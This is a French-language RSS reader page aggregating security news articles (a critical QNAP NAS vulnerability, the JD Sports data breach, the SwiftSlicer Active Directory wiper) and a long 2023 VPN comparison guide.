FreshRSS

🔒
❌ À propos de FreshRSS
Il y a de nouveaux articles disponibles, cliquez pour rafraîchir la page.
Aujourd’hui — 2 février 2023Flux principal

CVE-2022-27596 : cette faille critique affecte plus de 29 000 NAS QNAP

1 février 2023 à 21:43

En début de semaine, le fabricant QNAP a corrigé une faille de sécurité critique qui affecte ses NAS ! Les utilisateurs sont invités à installer la mise à jour en urgence. Faisons le point !

Associée à la référence CVE-2022-27596, cette faille de sécurité critique hérite d'un score CVSS de 9,8 sur 10 ! De type injection SQL, les pirates peuvent exploiter cette vulnérabilité à distance sur les NAS QNAP exposés sur Internet et non à jour ! D'après les détails techniques mis en ligne, cette faille de sécurité serait assez facile à exploiter et elle ne nécessite ni d'action de la part d'un utilisateur, ni d'être authentifié sur le NAS.

Quels sont les NAS QNAP vulnérables à la CVE-2022-27596 ?

Au sein du bulletin de sécurité de QNAP, on peut lire : "Une vulnérabilité a été signalée sur les appareils QNAP exécutant QTS 5.0.1 et QuTS hero h5.0.1. Si elle est exploitée, cette vulnérabilité permet à des attaquants distants d'injecter du code malveillant." - Ce n'est donc pas une question de modèles, mais de version de système.

Pour se protéger, les utilisateurs doivent installer une version patchée, à savoir à minima :

  • QTS 5.0.1.2234 build 20221201
  • QuTS hero h5.0.1.2248 build 20221215

Des dizaines de milliers de NAS QNAP vulnérables

Suite à la découverte de cette vulnérabilité, les chercheurs en sécurité de Censys ont mis en ligne un rapport révélant qu'il y avait plusieurs dizaines de milliers de NAS QNAP vulnérables à la CVE-2022-27596.

Censys a analysé 67 415 NAS QNAP, et sur ce total, il a été possible d'obtenir le numéro de version du système sur 30 520 appareils. Sur ce total de 30 520 appareils, il y en a seulement 557 qui sont protégés contre cette faille de sécurité. Autrement dit, il y a plus de 29 000 NAS QNAP exposés sur Internet et vulnérables à la CVE-2022-27596 !

Les NAS, et en particulier ceux de QNAP, sont régulièrement pris pour cible dans le cadre de campagnes d'attaques par ransomware. Il est clair que cette vulnérabilité représente une nouvelle opportunité pour les cybercriminels, donc si vous avez un NAS QNAP exposé sur Internet, n'attendez pas avant d'effectuer la mise à jour. Même si pour le moment, QNAP estime que cette vulnérabilité n'est pas activement exploitée.

Si vous ne pouvez pas appliquer la mise à jour, faites en sorte que votre NAS ne soit pas accessible depuis Internet (pas d'UPNP, ni de règle de redirection de ports).

Source

L'article CVE-2022-27596 : cette faille critique affecte plus de 29 000 NAS QNAP est disponible sur IT-Connect : IT-Connect.

Fuite de données chez JD Sports : 10 millions de clients concernés !

1 février 2023 à 17:01

Un serveur appartenant à la chaîne de magasins JD Sports a été piraté ! Les cybercriminels ont pu récupérer des informations sur les commandes effectuées par 10 millions de clients ! Faisons le point.

Très populaire au Royaume-Uni, la chaîne de magasins JD Sports est également très présente en France, avec des boutiques un peu partout sur l'hexagone. D'ailleurs, les adeptes de sportwear connaissent très bien JD Sports !

Dans un communiqué adressé par e-mail aux clients concernés, la direction de JD Sports explique que la fuite de données contient des informations pour des commandes passées entre novembre 2018 et octobre 2020. C'est en accédant à un serveur que les cybercriminels ont pu récupérer ces données.

Il est temps de répondre à la traditionnelle question "quelles sont les informations contenues dans cette fuite de données ?". Et bien, d'après le communiqué de JD Sports, il y a les informations suivantes : nom et prénom, adresse de livraison, adresse e-mail, numéro de téléphone, détails de la commande, informations sur la facturation et les 4 derniers chiffres du numéro de la carte bancaire !

Il est important de préciser que les cybercriminels n'ont pas eu accès aux mots de passe, et que JD Sports ne stocke pas les informations bancaires en intégralité. Mais bon, par précaution, il est préférable de renouveler votre mot de passe si vous avez un compte JD Sports.

Il est clair qu'avec toutes ces informations, les cybercriminels peuvent imaginer une campagne de phishing pour cibler les clients de JD Sports ! D'autant plus si l'e-mail contient les 4 derniers chiffres du numéro de la carte bancaire utilisé pour passer la commande, cela peut s'avérer particulièrement trompeur. Fort heureusement, il s'agit de commandes particulièrement anciennes donc certaines données sont probablement erronées.

Conscient du risque, la direction de JD Sports alerte les clients concernés : "Nous contactons de manière proactive les clients concernés afin de leur conseiller d'être vigilants face au risque de fraude et d'attaques de phishing".

Soyez vigilants.

Source

L'article Fuite de données chez JD Sports : 10 millions de clients concernés ! est disponible sur IT-Connect : IT-Connect.
Hier — 1 février 2023Flux principal

ANSSI 2023 – La supply chain au cœur de la menace cyber

1 février 2023 à 11:28
Par : UnderNews

Comme vous avez pu le lire dans son Panorama de la cyber menace 2022 publié en janvier, l’Agence nationale de la sécurité des systèmes d’information (ANSSI) met en avant la sophistication des attaques cyber, et la montée en puissance d’un ciblage dit « périphérique » qui comme l’explique le rapport, « confirme l’intérêt des attaquants pour les prestataires, les fournisseurs, les sous-traitants, les organismes […]

The post ANSSI 2023 – La supply chain au cœur de la menace cyber first appeared on UnderNews.

SwiftSlicer, un malware qui veut détruire votre Active Directory

31 janvier 2023 à 21:08

Les chercheurs en sécurité de chez ESET ont découvert un nouveau malware destructeur de données, surnommé SwiftSlicer, qui a un objectif bien précis : détruire votre domaine Active Directory !

Derrière SwiftSlicer, se cache le groupe de pirates russes Sandworm, et ce malware a été découvert par les chercheurs en sécurité d'ESET à la suite d'une cyberattaque contre une entité basée en Ukraine. Dernièrement, le groupe Sandworm s'en est pris à plusieurs reprises à l'Ukraine, notamment avec le destructeur CaddyWiper. Même s'il est question de Windows dans le cas présent, le groupe Sandworm utilise également des malwares "compatibles" Linux.

Codé en Go, qui est un langage très apprécié par les cybercriminels, le malware SwiftSlicer veut clairement détruire les domaines Active Directory car il s'en prend directement au répertoire "%CSIDL_SYSTEM_DRIVE%\Windows\NTDS" qui contient la base d'annuaire Active Diretory. Cette base d'annuaire Active Directory contient les informations du domaine, ainsi que l'ensemble des objets.

Pour détruire les données, le malware écrase le contenu des fichiers en les remplissant avec des blocs de 4096 octets, générés aléatoirement. L'action de destruction effectuée par SwiftSlicer peut être particulièrement dévastatrice. En effet, en détruisant la base d'annuaire, c'est tout le fonctionnement de l'infrastructure qui peut être perturbé, notamment l'ouverture de session, l'accès à des ressources (partages, applications, imprimantes, etc... Compte tenu de la place importante que prend l'Active Directory dans les organisations où il est déployé.

Pour procéder à la destruction du domaine Active Directory, les pirates doivent bénéficier des droits admins car ils utilisent une stratégie de groupe (GPO) pour exécuter SwiftSlicer sur les machines. Les chercheurs d'ESET ont également constaté que SwiftSlicer détruisait les clichés instantanés ainsi que des pilotes Windows, en plus de la base Active Directory en elle-même.

Une fois encore, cette menace montre à quel point il est important d'avoir un système de sauvegarde fiable et qu'il est indispensable de sauvegarder les contrôleurs de domaine, même s'il y en a plusieurs pour assurer la disponibilité du service Active Directory.

Source

L'article SwiftSlicer, un malware qui veut détruire votre Active Directory est disponible sur IT-Connect : IT-Connect.
À partir d’avant-hierFlux principal

Comparatif des meilleurs VPN gratuits et payants en 2023

12 février 2020 à 16:25

Dans cet article, vous trouverez toutes la sélection des meilleurs VPN en 2023 sous la forme d’un comparatif complet des VPN.
Une liste des VPN gratuits ainsi que quelques éléments autour des comparatifs de VPN vous sera fourni.
En effet, il existe beaucoup de comparatifs sur la toile dont certains sont des comparatifs déguisés pour mettre en avant certains VPN.

Ce comparatif VPN répond à toutes ces questions :

  • Quel est le meilleur VPN ?
  • Comment choisir son VPN ?
  • Quel VPN choisir ?

Le but est de vous aider à bien choisir un service de VPN en 2023 qui ne pose pas de problèmes de confidentialité, etc.

Comparatif des meilleurs VPN gratuits ou payants

Qui a besoin d’un VPN ?

Pour ceux qui ne savent pas exactement ce qu’est un VPN et surtout comment cela fonctionne, je vous invite à lire l’article :

Pour résumer un VPN permet une connexion entre deux réseaux à travers un tunnel sécurisé. Les données qui y transitent sont chiffrées.
Tout un business d’anonymisation existe sur la toile pour proposer des VPN afin de rediriger une partie ou tout votre trafic internet vers un serveur VPN.
Ainsi lorsque vous vous connectez à un serveur distant ce dernier ne voit que l’adresse IP du VPN et pas votre adresse IP réelle, celle de votre fournisseur d’accès internet.

En conclusion, tout un discours marketing est développé pour vous faire croire que cela sécurise votre connexion internet et vous rend anonyme.
Tout cela dans le but de vous faire acheter des VPN.
Comme souvent, cela est exagéré et les VPN ne rendent pas totalement anonymes, loin de là.
Enfin au delà de ces limites, la configuration du VPN est importante car si celle-ci est mal implémentée, certaines données peuvent fuiter.

Si vous cherchez le meilleur VPN avant cela, posez-vous la question : avez-vous vraiment besoin d’un VPN ?
En effet, pour un PC de bureau, cela n’a très peu d’intérêt.
Lire :

Enfin L’article suivant énumère les limites concernant ce discours :

Nous vous conseillons aussi de prendre connaissance de ce dernier pour bien comprendre les enjeux.

Les VPN gratuits oui mais…

Lorsque l’on cherche le meilleur VPN, on se tourner vers du gratuit.
En effet, on cherche à ne pas payer.

Ainsi des VPN gratuits peuvent comme les antivirus gratuits être des tremplins vers des abonnements payants ou collecter des données.

Il faut donc faire attention au service VPN que vous choisissez surtout si la vie privée vous importe.
Le site THAT one private donné plus bas est vraiment très bien pour cela.

Parfois il est très simple de connaître la Politique de respect de la vie privée, comme par exemple ci-dessous avec Freedom-IP.
Parfois c’est assez complexe, en anglais ou caché au fin fond d’un menu du site.

VPN Freedom-IP et politique de confidentialité

Comme souvent lorsque cela est gratuit, il faut se méfier car l’éditeur tente de monétiser.
On a vu des choses assez moches comme Hola VPN qui se comportaient comme un botnet.
Les clients VPN étaient utilisés pour effectuer des attaques.

Vous pouvez les utiliser de manière occasionnelle pour effectuer ou accéder à tel service.
Par contre, nous vous déconseillons d’utiliser un VPN gratuit pris au hasard pour surfer en permanence avec.

Liste des VPN gratuits et payants

Voici les VPN payants avec des offres premium les plus connus.
Notez que certains proposent des offres satisfait ou remboursé.
Ainsi avant les 30 jours d’utilisation, vous pouvez demander à être remboursé.

VPNÉditeurPays de l’entreprise mèreTarif
Avast! Secure line
AVG Secure VPN
Avast Software s.r.o.République TchèquePayant
Antivir Phantom VPNAvira Operations GmbH & Co. KGAllemagnePayant
BullGuard VPNBullGuard Ltd.Grande-BretagnePayant
CyberGhostKAPERoumaniePayant
Encrypt.MePayant
F-Secure FreedomeF-Secure Corp.FinlandePayant
Free OpenVPNCommunautéGratuit
ExpressVPNKAPELes îles Vierges britanniquesPayant
Freedom-IP
HMA VPNPrivax Ltd. (Avast!)Grande-BretagnePayant
Hide.meeVenture Ltd.MalaisieGratuit avec limitation de 2 Go de données par mois
Hotspot ShieldAnchorFree Inc.USAPayant
Private Internet AccessUSA, Panama ou îles ViergesPayant
IPVanishMudhook Media Inc.USAPayant
IVPPrivatus LtdGibraltar
Kaspersky Secure ConnectionAO Kaspersky LabRussiePayant
hide.me VPNeVenture Ltd.MalaisiePayant
HMA VPNPrivax LtdGrande-BretagnePayant
McAfee Safe ConnectMcAfee LLCUSAPayant
NordVPNTefincom & Co. S.A.PanamaPayant
Norton Secure VPNNortonLifeLock Inc.USAPayant
OVPNOVPN Integritet AB, orgSuèdePayant
PureVPNGZ Systems Ltd.Hong KongPayant
ProtonVPNProton Technologies AGSuisseOffre gratuite limité dans le temps
PsiPhonGratuit
SaferVPNSafer Social Ltd.IsraelPayant
StrongVPNStrong Technology LLCUSAPayant
TrustZonePayant
TunnelBearTunnelBear Inc.CanadaGratuit avec limitation de 500 Mo de données
SurfsharkSurfshark Ltd.Les îles Vierges britanniquesPayant
VyprVPNSuisse (liens avec USA)
WindscribeWindscribe Ltd.CanadaPayant
ZenMate VPNZenGuard GmbHAllemagnePayant
Comparatif des solutions VPN par pays et tarifs

Ces logiciels VPN gratuits se distinguent sur une limitation de volume de données sur plusieurs jours.
Bien entendu, la vitesse prend en compte.

Pour commencer, en version gratuite, il existe HotspotShield pour PC et Android. Ce dernier est très connu notamment lors de la connexion à des wifi publics.

Ensuite, pour les offres gratuites, rappelons qu’Opera offre un VPN intégré.
Vous pouvez utiliser les solutions à base d’OpenVPN dont voici un article complet.

Méfiez-vous des VPN gratuits, en effet, des VPN sont créés pour récupérer le trafic afin de vous pister ou pire voler des identifiants.
Il ne faut donc pas prendre le premier venu et bien se renseigner avant de l’installer.

Enfin pensez qu’il existe aussi la solution TOR pour anonymiser votre connexion.

Attention aux VPN gratuits pour Android ou sous la forme d’extension pour Chrome et Firefox, à lire : VPN gratuits : attention aux malwares et arnaques.

Les nouveautés en 2023 dans le monde du VPN

Une augmentation de prix pour beaucoup de services VPN.
SurfShark passe de 11,31€/mois à 12,95€/mois ou ExpressVPN qui passe de 11,77€/mois à 12,24 €/mois.

Les services VPN commencent à se diversifier en proposant des antivirus, des gestionnaires de mots de passe.
Mais il fallait s’y attendre, le but est de se démarquer mais aussi de proposer de nouveaux produits à vendre.
Probablement que certains vont ensuite proposer des logiciels de nettoyage ou de mises à jour de pilotes.

Pour le reste pas d’évolution majeure, on commence à constater une certaine stabilité.

Comparatif des meilleurs VPN gratuits et payants en 2023

CyberGhost

Fonctionne sur: Windows, Mac, Android, iOS, Linux | Période d’essai: 45 jours | Nombre de serveurs: 7 600+ | Emplacements des serveurs: 113| Pays: 94 | Nombre maximum d’appareils pris en charge: 5

CyberGhost fait partie des leaders avec un réseau assez étoffé de plus de 7600 serveurs réparties dans plus de 90 pays.

Ce service de VPN propose des serveurs pour torrents et streaming afin d’obtenir des vitesses maximales.
On trouve aussi CyberGhost NoSpy pour plus de protection contre la surveillance et confidentialité.
Non seulement ces serveurs sont cryptés en AES 256 bits, mais en plus, ils sont en Roumanie, hors de la juridiction des 5 yeux (et même des 14 yeux).
La législation n’impose aucune collecte vos données ou toute autre action de surveillance massive, par conséquent, nous garantissons notre politique de ZÉRO- LOG. Ceci est votre garantie contre l’espionnage ou l’enregistrement de vos activités.

L’application VPN peut aussi bloquer les publicités et traqueurs.

Ainsi la société indique ne pas enregistrer de journaux.
«La performance du Service est mesurée à travers une série d’événements envoyés de manière anonyme à des services tiers (MixPanel) qui construisent données agrégées basées sur certaines tendances ».
Ainsi ces données permettent de suivre les tentatives et les réussites de connexion, ainsi que les pays d’où proviennent les demandes de connexion.

CyberGhost a été racheté par KAPE qui a un passif assez suspicieux, lire : meilleurs vpn gratuits.

Les tarifs de CyberGhost varient selon la durée d’engagement :

1 Mois2 Ans6 mois
11,99 €/mois2,19 €/mois6,99 €/mois
Les tarifs Cyberghost

Pour

Contre

  • Très simple d'utilisation

  • 45 jours pour vous rétracter

  • Enregistre le minimum d'informations sur la connexion (pays, date)

  • Pas de version d'essai

  • Kape Technologies PLC

ExPressVPN

Fonctionne sur: Windows, Mac, Android, iOS, Linux | Période d’essai: 30 jours | Nombre de serveurs: ? | Emplacements des serveurs: 160 | Pays: 94 | Nombre maximum d’appareils pris en charge: 5 | Juridiction : Îles Vierges Britaniques

ExpressVPN est simple à installer et à utiliser, donc parfait pour les utilisateurs non experts. Il existe un choix de plus de 94 pays, dont les États-Unis et le Royaume-Uni.
Les plans tarifaires comprennent des abonnements d’un mois, six mois et un an. Une garantie de remboursement de 30 jours est disponible, bien qu’il n’y ait pas d’essai gratuit.

Vous avez droit à cinq connexions simultanées avec énormément de syst-me supporté dont Windows, Mac, Android, iOS et Linux.
Également, le service VPN donne des aides pour l’installer sur Apple TV, Roku, Amazon Fire Stick, les téléviseurs intelligents, PlayStation, Xbox et les routeurs.
Enfin des extensions pour chrome et Firefox sont aussi proposées.

ExpressVPN propose des fonctionnalités de Kill-Switch, Trusted Servers pour éviter la fuite de données.
Il indique aussi pouvoir être utilisé sur Netflix, Hulu, la BBC et d’autres sites avec un VPN.
Enfin le split-tunneling VPN pour pouvoir rediriger qu’une partie du trafic vers le VPN.

La politique de confidentialité de l’entreprise stipule qu’elle suit une «politique de non-journalisation», mais les informations enregistrées sur le compte de l’utilisateur concernant les dates d’utilisation du VPN, à partir de quel pays / FAI et à quel emplacement VPN auquel l’utilisateur se connecte sont toujours collectées.

En 2021, ExpressVPN a été racheté par Kape et les conditions d’utilisations ont changé et notamment la journalisation. A lire : Meilleurs VPN gratuits – ExpressVPN
1 mois6 mois12 mois
12,24€ par mois9,44 € par mois7,86€ par mois
Les tarifs d’ExpressVPN

Pour

Contre

  • Simple d'utilisation

  • Garantit aucun log et journaux

  • Loin d'être le plus rapide des VPN

  • Pas de version d'essai

  • Kape Technologies PLC

HMA VPN (Hide My Ass)

Fonctionne sur: Windows, Mac, Android, iOS, Linux | Période d’essai: 30 jours | Nombre de serveurs: 1100+ | Emplacements des serveurs: 90 | Pays: 190 | Nombre maximum d’appareils pris en charge: 5 | Juridiction : République Tchèque

HMA VPN (Hide My Ass) est le service VPN proposé par Avast! qui offre le plus de pays avec 190 pays dans le monde.
Toutefois, il n’offre que 1100 serveurs ce qui est beaucoup moins que certains concurrents.

HMA indique n’enregistrer ni votre adresse IP réelle, ni la quantité de données que vous envoyez sur leurs serveurs.
Par contre il peut collecter certaines données anonymes.

On retrouve les fonctionnalités habituelles comme le Split-Tunneling ou Kill-Switch.

1 mois1 an3 an
10,99€ par mois4,39€ par mois2,99€ par mois
Les tarifs HMA

Pour


Contre

  • Propose beaucoup de pays

  • Se place dans les meilleurs au niveau de la connexion

  • Enregistre les données anonymes

IPVanish

Fonctionne sur: Windows, Mac, Android, iOS, Linux | Période d’essai: 30 jours | Nombre de serveurs: 2000+| Emplacements des serveurs: 75 | Pays: 52 | Nombre maximum d’appareils pris en charge: N/A | Juridiction : USA

IPVanish est une solution VPN qui a un peu de retard sur ses concurrents mais qui propose tout de même 2000 serveurs.
Pour se démarquer, il propose une solution avec un stockage et hébergement Cloud en ligne pour 500 Go via SugarSync.

On retrouve le chiffrement AES-256, Kill-Switch ainsi que la protection contre les fuites DNS et IPv6.
Par contre la solution VPN ne propose pas de blocage des publicités ou traqueurs.

1 mois1 an
11,99 $ par mois3,99 $ par mois
Les tarifs d’IPVanish

Pour

Contre

  • Intéressant pour stocker des données dans le cloud

  • Garantit aucun journal et log

  • Pas de version d'essai

  • Pas de blocage des publicités et traqueurs

  • Plutôt dans les VPN les plus lents

IVPN

Fonctionne sur: Windows, Mac, Android, iOS, Linux | Période d’essai: 30 jours | Nombre de serveurs: 77 | Emplacements des serveurs: 51 | Pays: 44| Nombre maximum d’appareils pris en charge: 2 | Juridiction : Gibraltar

IVPN prend actuellement en charge WireGuard(Ouvrira une nouvelle fenêtre) et OpenVPN dans ses applications Android, iOS, Linux, macOS et Windows. L’application iOS d’IVPN prend également en charge l’excellent protocole IKEv2. Notez qu’IVPN a mis en libre accès le code de ses applications, et a rendu son application Android disponible sur le dépôt d’applications open-source F-Droid.

C’est celui qui offre le moins de serveur.
Le Kill Switch n’est disponible que pour Android mais la solution fournit un système anti-tracking.

Ce service VPN est proposé Privatus Ltd dont la juridiction se trouve à Gibraltar.
Elle s’efforce d’être transparent en publiant l’audit, le nombre de requête faites par les autorités.
Enfin elle publie également un canari de mandat signé de manière cryptographique

PROS

CONS

  • Assez transparent

  • Peu de serveurs

Mullvad VPN

Fonctionne sur: Windows, Mac, Android, iOS, Linux | Période d’essai: 30 jours | Nombre de serveurs: 700+ | Emplacements des serveurs: N/A | Pays: 41| Nombre maximum d’appareils pris en charge: 5 | Juridiction : Suède

Mullvad VPN est un VPN proposé par la société Amagicom AB établie en Suède.
Le code du logiciel VPN est open source et la société dit opérer des audits externes.

Cette solution VPN ne demande aucune information personnelle si ce n’est une adresse email.
Elle promet aussi une politique “No-logging”, c’est à dire qu’elle n’enregistre aucun journal grâce à son emplacement de juridiction.

Le réseau est composé d’environ 700 serveurs pour environ 38 pays.
On retrouve les fonctionnalités de VPN classiques telles que le Split tunneling, Multihopping et le blocage de la publicité et traqueurs.

1 mois1 an
5€ par mois5 € par mois
Les tarifs de Mullvad VPN

Pour

Contre

  • Respecte la vie privée

  • Nombre de serveurs et pays

Mozilla VPN

Fonctionne sur: Windows, Mac, Android, iOS, Linux | Période d’essai: 30 jours | Nombre de serveurs: 871+ | Emplacements des serveurs: N/A | Pays: 30| Nombre maximum d’appareils pris en charge: 5 | Juridiction : USA

Mozilla l’éditeur du navigateur internet Mozilla Firefox s’est lancé en 2021 dans le marché du VPN.
Son réseau est nouveau et ne compte que +800 serveurs pour 41 pays et fonctionne avec Wireguard.
Mozilla s’appuie en réalité sur le VPN Mullvad établit en Suède.
Le service indique n’effectuer aucun limitation de la bande passante, ni n’enregistrer aucune trace de votre activité sur leur réseau.
Toutefois dans les conditions d’utilisation, on peut lire :

Mozilla VPN reçoit votre adresse IP depuis votre compte Firefox lorsque vous vous inscrivez au service et l’utilisez. Nous utilisons l’adresse IP pour en déduire approximativement votre localisation, car Mozilla VPN n’est actuellement disponible que dans certains pays.

Lorsque Mozilla VPN se connecte à nos serveurs pour authentifier et mettre à jour votre compte Mozilla VPN, votre adresse IP est temporairement collectée par nos journaux de serveurs. Notre partenaire Mullvad ne conserve pas les journaux de serveurs enregistrant votre activité réseau lorsque vous utilisez le service Mozilla VPN.

1 mois1 an
9,99€ par mois4,99€ par mois
Les tarifs de Mozilla VPN

Pour

Contre

  • Respecte la vie privée

  • N'apporte rien par rapport à Mullvad VPN

NordVPN

Fonctionne sur: Windows, Mac, Android, iOS, Linux | Période d’essai: 30 jours | Nombre de serveurs: 5 400+ | Emplacements des serveurs: 160 | Pays: 60 | Nombre maximum d’appareils pris en charge: 5 | Juridiction : Panama

NordVPN fait partie des leader avec une application qui regorge de fonctionnalités.

Le réseau VPN propose l’accès à 60 pays et plus de 5400 serveurs.

Pour les internautes qui téléchargent, NordVPN propose des serveurs optimisés P2P.
Mais aussi le double VPN qui permet d’assurer une confidentialité sur internet.
Le client VPN peut aussi bloquer les publicités et trackers durant le surf pour éviter le pistage.
Du côté technique, en 2020, NordVPN est passé sur Wireguard à travers un protocole maison NordLynx afin de proposer des temps de connexion quasi instantanés et des téléchargements plus rapides sur toutes les plates-formes.

Les améliorations de l’infrastructure incluent des normes de sécurité plus élevées pour les centres de données utilisés par NordVPN et des audits pour confirmer qu’ils sont respectés. Tous les serveurs sont désormais des systèmes basés sur RAM sans disque et sans stockage local persistant, et un deuxième audit de PWC Suisse confirme les informations d’identification sans journalisation de NordVPN.

Les prix de NordVPN sont équitables, et si vous n’êtes pas tout à fait convaincu qu’il s’agit du VPN pour vous, une garantie de remboursement de 30 jours vous offre un moyen sans risque de tester le service par vous-même.

Un VPN vraiment impressionnant qui est encore plus intéressant lorsque vous vous abonnez plus longtemps.

1 mois1 an2 ans
11,99€ par mois4,99€ par mois3,49€ par mois
Les tarifs de NordVPN

Pour

Contre

  • Un réseau important

  • NordLynx avec WireGuard

  • Double VPN

  • Se place dans les meilleurs en terme de vitesse

  • Le client VPN peut parfois causer des problèmes de fonctionnement ou plantage

Private Internet Access

Fonctionne sur: Windows, Mac, Android, iOS, Linux | Période d’essai: 30 jours | Nombre de serveurs: 3 5000 | Pays: 84 | Nombre maximum d’appareils pris en charge: 10 | Juridiction : USA, Panama ou îles Vierges

Private Internet Access est un service VPN avec plus de 10 ans d’expérience.
L’offre est complète avec 10 connexions simultanées, Split Tunneling avancé, Kill Switch, blocage des publicités et malware, ainsi qu’une Licence Boxcryptor.
C’est aussi celui qui propose le plus de connexions simultanées avec 10 appareils à la fois.

Enfin vous pouvez aussi choisir plusieurs offres avec un siège social différent : USA, Panama ou îles Vierges.

Aucune offre gratuite n’est disponible, mais un essai de 30 jours.

1 mois1 an3 ans
11,99€ par mois3,1€ par mois1,79€ par mois
Les tarifs de Private Internet Access

Pour

Contre

  • Beaucoup de serveurs

  • Offre complète

  • Pas de version gratuite

ProtonVPN

Fonctionne sur: Windows, Mac, Android, iOS, Linux | Période d’essai: 30 jours | Nombre de serveurs: 1 900+ | Pays: 67| Nombre maximum d’appareils pris en charge: Selon l’offre | Juridiction : Suisse

ProtonVPN est le VPN de Proton qui propose notamment Protonmail, ProtonDrive et ProtonCalendar.
Il propose une version gratuite avec une seule connexion et une limitation des pays.

Plus de 60 pays sont fournis pour environ 1900 serveurs, dont le Royaume-Uni et les États-Unis. Une large gamme de plans tarifaires est disponible, dans laquelle on peut choisir le nombre d’appareils (de 1 à 10) et les pays hébergeant des serveurs VPN disponibles.

La fonction NetShield permet de bloquer les publicités, malwares et traqueurs.

ProtonVPN a même commencé à auditer ses applications pour montrer qu’ils respectent les normes de confidentialité rigoureuses d’aujourd’hui.

ProtonVPN est une solution efficace pour un VPN rapide.
Il devrait convenir à la plupart des internautes car il propose une solution très simple et pratique.

Gratuit1 mois
1 an2 ans
1 connexion VPN
Serveurs dans 3 pays
Vitesse moyenne
Pas de journaux/pas de publicités
Prise en charge P2P/BitTorrent
VPN Secure Core
Tor via VPN
Accès au contenu bloqué
4,99 €/mois5,49€/mois4,99€/mois
Les tarifs des solutions VPN Proton

Pour


Contre

  • Facile à mettre en place

  • Audit des applications

  • Les offres sans engagements

  • Réseau moins important que ses concurrents

  • Pas encore passé sur WireGuard

PureVPN

Fonctionne sur: Windows, Mac, Android, iOS, Linux | Période d’essai: 31 jours | Nombre de serveurs: 6 500+ | Pays: 78| Nombre maximum d’appareils pris en charge: 10 | Juridiction : Hong-Kong

PureVPN est un VPN Chinois assez simple à mettre en place.
Sur le site, on trouve différents tutoriels et applications pour installer le VPN sur Windows, Linux, MacOSX, Android et même votre routeur.

Ce VPN propose des serveurs pour le streaming ou des paramètres de confidentialités élevés lorsque vous devez effecteur des paiements depuis des connexions non sûres.

PureVPN propose 10 connexions simultanées et clame un réseau de 78 pays dans 180 localisations géographiques avec 6500 serveurs.

1 mois1 an2 an
10,55€ par mois3,07€ par mois1,93€ par mois
Les tarifs PureVPN

Pour

Contre

  • Gamme assez complète

  • Support complet des appareils

  • Origine Chinoise donc possible surveillance (soumis aux lois chinoises)

  • Pas dans les plus rapides

Surfshark VPN

Fonctionne sur: Windows, Mac, Android, iOS, Linux | Période d’essai: 30 jours | Nombre de serveurs: 3 200+ | Pays: 100| Nombre maximum d’appareils pris en charge: illimité | Juridiction : Pays-Bas

Présent dans 65 pays avec plus de 3 200 serveurs, SurfSharck est une solution VPN qui peut concurrencer les grands noms tels que NordVPN, Express VPN, CyberGhost et Proton VPN.

Vous pouvez l’utiliser pour votre ordinateur de bureau Windows, Mac et Linux mais aussi sur tablette.
Quelques téléphones mobiles (iOS et Android tous deux couverts) et Amazon Fire TV Stick pour regarder la télévision à l’étranger, le seul compte vous couvrira tous simultanément.

Il propose aussi la fonction Whitelister pour autoriser des applications et des sites web spécifiques à contourner le VPN.

Enfin ce VPN offre les fonctionnalités classiques tels que Kill-Switch et le blocage de publicités et traqueurs.

1 mois1 an24 mois
12,95€ par mois3,99€ par mois2,49€ par mois
Les tarifs de Surfshark VPN

Pour

Contre

  • Simple d'utilisation

  • Un des plus rapides

  • Pas de version d'essai

TunnelBear

Fonctionne sur: Windows, Mac, Android, iOS, Linux | Période d’essai: 30 jours | Nombre de serveurs: 1600|Pays: 47| Nombre maximum d’appareils pris en charge: N/A | Juridiction : Canada

TunnelBear est une solution VPN localisé au Canada et rachetée en 2018 par McAfee.
Ainsi, il faut faire très attention aux politiques gouvernementales qui ne garantissent pas une totale confidentialité des données.
Même si l’éditeur indique avoir fait plusieurs audits de son service par des sociétés indépendantes.

Le réseau est moins important que ses concurrents avec 47 pays.
Le nombre de serveurs totale n’est pas indiqué.

On retrouve ensuite les fonctionnalités classiques.
Un client pour Windows, Mac, Android, iOS, Linux qui propose une fonction Kill-Switch sous le nom VigilantBear.
La fonction SplitBear pour exclure des applications du VPN n’est disponible que pour Android.
Il existe aussi une version allégée sous la forme d’une extension pour Firefox, Chrome ou Opera.
Une version gratuite existe avec une limitation de 500 Mo sur les données afin de pouvoir tester le VPN.

Il se classe dans les VPN corrects en terme de vitesse.

Gratuit1 anTeams
Limitation à 500 Mo3,33$ par mois5,75$ par mois
Les tarifs de TunnelBear

Pour

Contre

  • Une version d'essai gratuit

  • Pas très cher

  • Assez simple d'utilisation

  • Vitesse de connexion correctNew List Item

  • Un réseau moins étoffé que ses concurrents

  • En anglais

Windscribe

Fonctionne sur: Windows, Mac, Android, iOS, Linux | Période d’essai: 30 jours | Nombre de serveurs: N/A | Pays: 63 | Emplacements des serveurs: 110 | Nombre maximum d’appareils pris en charge: N/A | Juridiction : Canada

Tout comme TunnelBear, Windscribe est un service VPN qui se trouve au Canada.
Cela implique donc de faire attention aux politiques de journaux et possibles portes dérobées pour des agences gouvernementales.

Windscribe propose 63 pays sans indiquer le nombre de serveurs. Cela le place dans la moyenne.

En terme de fonctionnalité, il est assez complet avec le double VPN pour garantir un anonymat total.
Les fonctions de Split Tunnel et Kill Switch sont aussi proposées.
Pour plus de vitesse, il supporte WireGuard.
L’utilisateur peut créer des règles de blocages sur des domaines pour se protéger des trackers.

Windscribe indique ne pas enregistrer de journaux mais le service enregistre les connexions établies et vitesses.

Gratuitsans engagement1 an
Limitation sur les emplacements9$ par mois4,08$ par mois
Les tarifs de Windscribe

Pour

Contre

  • Beaucoup de fonctionnalités

  • Vitesse correcte

  • Le service enregistre les connexions établies et vitesses

Les autres services de VPN

Voici quelques autres VPN dont parfois, il n’est pas facile de connaître la société derrière.

  • Astrill VPN : 57 pays dans 113 villes pour 30$/mois. Aucune information sur la société
  • Atlas VPN : 500 serveurs dans 38 pays avec un Bloqueur de pubs pour 9.69€/mois. Aucune information sur la société
  • TorGuard VPN : est un service VPN proposé par VPNetworks LLC au USA. Pour 9.99$/mois, vous bénéficiez de 3000 serveurs dans 50 pays
  • VyprVPN : est un service VPN Suisse mais en lien avec les USA. Ils propose actuellement 700 serveurs dans 60 pays pour 10,85 €/mois

La suite sur la page suivante.

L’article Comparatif des meilleurs VPN gratuits et payants en 2023 est apparu en premier sur malekal.com.

Méfiez-vous de ces applis de santé, vous serez envahis de pubs

30 janvier 2023 à 18:50

Des applications de santé disponibles sur Google Play vous promettent de gagner de l'argent avec un nombre de pas quotidien. Les utilisateurs ne reçoivent que quelques pièces et leur smartphone est saturé de publicités.  [Lire la suite]

